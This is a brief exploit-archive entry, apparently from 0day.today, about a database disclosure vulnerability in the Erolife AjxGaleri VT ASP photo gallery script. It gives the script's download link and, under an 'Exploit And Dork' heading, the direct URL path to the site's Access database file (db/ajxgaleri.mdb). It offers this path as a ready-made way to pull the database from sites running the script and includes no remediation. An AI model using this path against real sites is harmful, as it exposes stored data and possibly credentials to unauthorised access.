id: 10625
date: 01/06/2010
title: Erolife AjxGaleri VT Database Disclosure Vulnerability
author: LionTurk
cves: 

======================================================
Erolife AjxGaleri VT Database Disclosure Vulnerability 
======================================================

  [»] Script:             [ Erolife AjxGaleri VT  ] 
 
    [»] Language:           [ ASP ] 
 
    [»] Download:           [ http://www.aspindir.com/goster/4322] 

===[ Exploit And Dork  ]=== 
 
    
 
  [»] http://localhost/path/db/ajxgaleri.mdb



#  0day.today [2023-03-22]  #